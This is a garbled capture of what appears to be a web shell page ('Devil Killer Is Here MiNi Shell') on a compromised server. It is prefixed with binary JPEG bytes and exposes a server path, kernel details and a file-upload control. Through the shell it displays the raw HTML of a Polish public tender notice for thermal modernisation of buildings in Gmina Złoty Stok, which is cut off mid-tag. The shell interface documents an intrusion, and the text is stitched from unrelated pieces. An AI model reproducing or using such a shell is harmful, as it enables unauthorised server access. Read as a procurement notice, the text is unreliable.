JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250218/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250218/0010824401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Termomodernizacja obiektów publicznych na obszarze Gminy Złoty Stok </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ZŁOTY STOK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890718484</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Złoty Stok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">57-250</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">748164164</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">748164133</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@zlotystok.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zlotystok.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Termomodernizacja obiektów publicznych na obszarze Gminy Złoty Stok </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b9a87478-97e1-4f9b-a7d5-c1ba4da74cbd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00108244</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00017327/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Termomodernizacja budynków użyteczności publicznej na terenie Złotego Stoku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> ZIT POF w ramach środków FST w ramach projektu pn.: „Termomodernizacja obiektów publicznych na obszarze Gminy Złoty Stok” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zlotystok.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zlotystok.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji: za pośrednictwem Platformy znajdującej się pod adresem: https://zlotystok.ezamawiajacy.pl w zakładce „Korespondencja”. Szczegółowe zasady zostały określone w Rozdziale VIII SWZ - Informacje o środkach komunikacji elektronicznej, przy użyciu,których zamawiający będzie komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Został określony w Rozdziale XXXVII SWZ - Klauzula informacyjna</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Został określony w Rozdziale XXXVII SWZ - Klauzula informacyjna</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RL.271.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I: Termomodernizacja budynku użyteczności publicznej w miejscowości Chwalisław 50<br/><br/>Zamawiający informuję, że wszystkie prace będą prowadzone na terenie czynnych obiektów i w związku z powyższym Wykonawca zobowiązany jest uzyskać wszelkie konieczne zgody i zezwolenia Zamawiającego i prezesa PP-U „KOMA” Sp. z o.o. do wyłączeń instalacji, niezbędnego zdemontowania istniejących instalacji, zamontowania instalacji i urządzeń tymczasowych, usunięcia instalacji i urządzeń tymczasowych i ponownego zamontowania istniejących instalacji i każdorazowo na podstawie uzgodnień poczynionych z Zamawiającym i prezesem PP-U „KOMA” Sp. z o.o.. <br/><br/>Zamówienie obejmuje: <br/>- opracowanie projektu budowlanego oraz innych opracowań, jeżeli będą wymagane do uzyskania zgody organu administracji architektoniczno-budowlanego na realizację zadania opracowany zgodnie wytycznymi audytu energetycznego,<br/>- opracowanie projektu technicznego zawierającego odpowiednie rozwiązania techniczne , rysunki i obliczenia, <br/>- opracowanie projektu wykonawczego wielobranżowego, <br/>- wykonanie prac budowlanych: <br/>•	docieplenie przegród zewnętrznych i wewnętrznych, <br/>•	wymiana stolarki okiennej i drzwiowej, <br/>•	modernizacja systemu grzewczego, <br/>•	wymiana opraw oświetleniowych w budynku na energooszczędne, <br/>•	wykonanie mikroinstalacji PV <br/>i inne wynikające z rozwiązań przyjętych w dokumentacji projektowej <br/>- przeprowadzenie wymaganych prób i badań, uzyskanie odbiorów robót i przygotowanie dokumentów związanych z oddaniem do użytkowania wybudowanych instalacji i budynku po robotach termomodernizacyjnych, w tym badania termowizyjnego oraz próby szczelności budynku. <br/>- przekazanie obiektu Zamawiającemu <br/>ZAKRES ZADANIA <br/>Wykonanie dokumentacji projektowej wraz ze wszystkimi wymaganymi prawem uzgodnieniami, decyzjami, pozwoleniami itp., a następnie wykonanie wszelkich wymaganych robót budowlanych, wraz z dokonaniem zgłoszenia zakończenia robót (jeżeli wymagane) i przekazanie obiektu. <br/>Zamawiający oczekuje, że w wyniku termomodernizacji uzyskana zostanie poprawa parametrów energetycznych budynku poprzez zmniejszenie strat ciepła przez przegrody budowlane, ograniczenie nadmiernej, niekontrolowanej infiltracji powietrza wentylacyjnego dostającego się do pomieszczeń, zwiększenie sprawności systemu grzewczego oraz ograniczenie zużycia energii elektrycznej poprzez modernizację instalacji wewnętrznego oświetlenia oraz wykonanie instalacji PV. W wyniku realizacji prac podwyższeniu ulegnie klasa energetyczna budynku oraz ograniczone zostanie zużycie energii cieplnej i elektrycznej, a co za tym idzie zmniejszeniu ulegnie również wysokość opłat eksploatacyjnych. <br/>Dodatkowym spodziewanym czynnikiem jest ograniczenie emisji zanieczyszczeń powstających w źródle ciepła w wyniku wytwarzania energii potrzebnej do ogrzewania budynku. Przewiduje się zastosowanie odnawialnych źródeł energii: energia promieniowania słonecznego.<br/>ZAKRES ROBÓT BUDOWLANYCH <br/>Zadanie obejmuje wykonanie robót budowlanych polegających na: <br/>- dociepleniu ścian zewnętrznych, <br/>- dociepleniu ścian fundamentowych wraz z ich ewentualnym osuszeniem i wykonaniem izolacji przeciwwodnych / przeciwwilgociowych, oraz odtworzeniem żwirowej opaski ochronnej wokół budynku, <br/>- docieplenie stropów pomiędzy częścią ogrzewaną i nieogrzewaną, <br/>- wymiana stolarki zewnętrznej, <br/>- wymiana parapetów zewnętrznych, <br/>- instalowaniu pomp ciepła (nowe źródło ciepła dla instalacji c.o. i c.w.u) o mocy cieplnej nie większej niż 40kW (mocy elektrycznej nie większej 20kW), <br/>- instalowanie urządzeń fotowoltaicznych o mocy nie większej niż 25kW (na dachu obiektu), <br/>- częściowa modernizacja instalacji elektrycznej, <br/>- modernizacji wewnątrz użytkowanego budynku instalacji c.o. wraz z częściowym demontażem istniejącej, <br/>- wprowadzenie niezbędnych zmian w instalacji c.w.u. (połączenie z nowym źródłem ciepła), <br/>- remont/wykonanie przewodów wentylacyjnych, <br/>- wymiana opraw oświetleniowych w budynku na energooszczędne, <br/>- modernizacja instalacji odgromowej, <br/>i inne wynikające z rozwiązań przyjętych w dokumentacji projektowej.<br/>CHARAKTERYSTYCZNE PARAMETRY OKREŚLAJĄCE WIELKOŚĆ OBIEKTU <br/>Pow. zabudowy ok. 304 m2 <br/>Wymiary budynku (szer. x dł.) 12,2m x 24,5m <br/>Kubatura brutto ok. 2299,5 m3 <br/>Wysokość(kalenica) 9,56 m (licząc od poz. gł. wejścia) <br/>Wysokość okapu 3,5 - 5,8 m <br/>Ilość kondygnacji nadziemnych 1 <br/>Ilość kondygnacji podziemnych 1 <br/><br/>Budynek pełni funkcję świetlicy wiejskiej. <br/>W wyniku przeprowadzenia termomodernizacji budynku, sposób użytkowania nie ulegnie zmianie. <br/><br/>Wejście główne do budynku wraz z holem głównym usytuowane jest centralnie. Budynek mieści 2 sale wielofunkcyjne, pomieszczenia higieniczno-sanitarne, kuchnię, magazynki. Wejście do części piwnicznej (kotłowni) znajduje się w holu głównym. Od zewnątrz, na poziomie terenu przy elewacji frontowej znajduje się wejście do drugiej części piwnicznej (magazynku). Dostęp do poddasza nieużytkowego zapewniony jest schodami strychowymi rozkładanymi w holu głównym.<br/><br/>Obiekt nie jest wpisany do rejestru zabytków, znajduje się w historycznym układzie ruralistycznym wsi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona w oparciu o przedstawione w SWZ kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II: Termomodernizacja budynku użyteczności publicznej w miejscowości Laski 126<br/>Zamawiający informuję, że wszystkie prace będą prowadzone na terenie czynnych obiektów i w związku z powyższym Wykonawca zobowiązany jest uzyskać wszelkie konieczne zgody i zezwolenia Zamawiającego i prezesa PP-U „KOMA” Sp. z o.o. do wyłączeń instalacji, niezbędnego zdemontowania istniejących instalacji, zamontowania instalacji i urządzeń tymczasowych, usunięcia instalacji i urządzeń tymczasowych i ponownego zamontowania istniejących instalacji i każdorazowo na podstawie uzgodnień poczynionych z Zamawiającym i prezesem PP-U „KOMA” Sp. z o.o.. <br/>Zamówienie obejmuje: <br/>- opracowanie projektu budowlanego oraz innych opracowań, jeżeli będą wymagane do uzyskania zgody organu administracji architektoniczno-budowlanego na realizację zadania opracowany zgodnie wytycznymi audytu energetycznego stanowiącego załącznik do PFU, <br/>- opracowanie projektu technicznego zawierającego odpowiednie rozwiązania techniczne , rysunki i obliczenia, <br/>- opracowanie projektu wykonawczego wielobranżowego, <br/>- wykonanie prac budowlanych: <br/>•	docieplenie przegród zewnętrznych i wewnętrznych, <br/>•	wymiana stolarki okiennej i drzwiowej, <br/>•	modernizacja systemu grzewczego, <br/>•	wymiana opraw oświetleniowych w budynku na energooszczędne, <br/>•	wykonanie mikroinstalacji PV <br/>i inne wynikające z rozwiązań przyjętych w dokumentacji projektowej <br/>- przeprowadzenie wymaganych prób i badań, uzyskanie odbiorów robót i przygotowanie dokumentów związanych z oddaniem do użytkowania wybudowanych instalacji i budynku po robotach termomodernizacyjnych, w tym badania termowizyjnego oraz próby szczelności budynku. <br/>- przekazanie obiektu Zamawiającemu <br/>ZAKRES ZADANIA <br/>Wykonanie dokumentacji projektowej wraz ze wszystkimi wymaganymi prawem uzgodnieniami, decyzjami, pozwoleniami itp., a następnie wykonanie wszelkich wymaganych robót budowlanych, wraz z dokonaniem zgłoszenia zakończenia robót (jeżeli wymagane) i przekazanie obiektu. <br/>Zamawiający oczekuje, że w wyniku termomodernizacji uzyskana zostanie poprawa parametrów energetycznych budynku poprzez zmniejszenie strat ciepła przez przegrody budowlane, ograniczenie nadmiernej, niekontrolowanej infiltracji powietrza wentylacyjnego dostającego się do pomieszczeń, zwiększenie sprawności systemu grzewczego oraz ograniczenie zużycia energii elektrycznej poprzez modernizację instalacji wewnętrznego oświetlenia oraz wykonanie instalacji PV. W wyniku realizacji prac podwyższeniu ulegnie klasa energetyczna budynku oraz ograniczone zostanie zużycie energii cieplnej i elektrycznej, a co za tym idzie zmniejszeniu ulegnie również wysokość opłat eksploatacyjnych. <br/>Dodatkowym spodziewanym czynnikiem jest ograniczenie emisji zanieczyszczeń powstających w źródle ciepła w wyniku wytwarzania energii potrzebnej do ogrzewania budynku. Przewiduje się zastosowanie odnawialnych źródeł energii: energia promieniowania słonecznego.<br/> ZAKRES ROBÓT BUDOWLANYCH <br/>Zadanie obejmuje wykonanie robót budowlanych polegających na: <br/>- dociepleniu ścian zewnętrznych, <br/>- dociepleniu ścian fundamentowych wraz z ich ewentualnym osuszeniem i wykonaniem izolacji przeciwwodnych / przeciwwilgociowych, oraz odtworzeniem żwirowej opaski ochronnej wokół budynku, <br/>- docieplenie stropów pomiędzy częścią ogrzewaną i nieogrzewaną, <br/>- wymiana stolarki zewnętrznej, <br/>- wymiana parapetów zewnętrznych, <br/>- instalowaniu pomp ciepła (nowe źródło ciepła dla instalacji c.o. i c.w.u) o mocy cieplnej nie większej niż 40kW (mocy elektrycznej nie większej 20kW), <br/>- instalowanie urządzeń fotowoltaicznych o mocy nie większej niż 25kW (na dachu obiektu), <br/>- częściowa modernizacja instalacji elektrycznej, <br/>- modernizacji wewnątrz użytkowanego budynku instalacji c.o. wraz z częściowym demontażem istniejącej, <br/>- wprowadzenie niezbędnych zmian w instalacji c.w.u. (połączenie z nowym źródłem ciepła), <br/>- remont/wykonanie przewodów wentylacyjnych, <br/>- wymiana opraw oświetleniowych w budynku na energooszczędne, <br/>- modernizacja instalacji odgromowej, <br/>i inne wynikające z rozwiązań przyjętych w dokumentacji projektowej.<br/>CHARAKTERYSTYCZNE PARAMETRY OKREŚLAJĄCE WIELKOŚĆ OBIEKTU <br/>Pow. zabudowy ok. 377,6 m2 <br/>Kubatura brutto 2132,9 m3 <br/>Wymiary budynku 14,99m x 33,95m <br/>Wysokość (kalenica) 9,7 m <br/>Wysokość okap (dach płaski) 3,5 – 4,8 m <br/>Wysokość okap (dach skośny) 5,7 m <br/>Ilość kondygnacji nadziemnych 2 <br/>Ilość kondygnacji poddziemnych 1 <br/><br/>Budynek pełni funkcję świetlicy wiejskiej oraz biblioteki. <br/>W wyniku przeprowadzenia termomodernizacji budynku, sposób użytkowania nie ulegnie zmianie. <br/>W piwnicy znajduje się kotłownia. <br/>Na parterze zlokalizowano pomieszczenia świetlicy wraz z zapleczem. W dobudowanej części wschodniej znajduje się sala wielofunkcyjna, pomieszczenia higieniczno-sanitarne, wiatrołap z szatnią.<br/>W zachodniej części zlokalizowano kuchnię, pom. higieniczno-sanitarne, socjalne, biuro. <br/>Na 1 piętrze w cz. zachodniej znajduje się biblioteka z czytelnią, pom. socjalne, pom. higieniczno-sanitarne. <br/>Kondygnacje zachodniej części budynku połączone są wewnętrznymi schodami.<br/><br/>Obiekt nie jest wpisany do rejestru zabytków, znajduje się w historycznym układzie ruralistycznym wsi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona w oparciu o przedstawione w SWZ kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 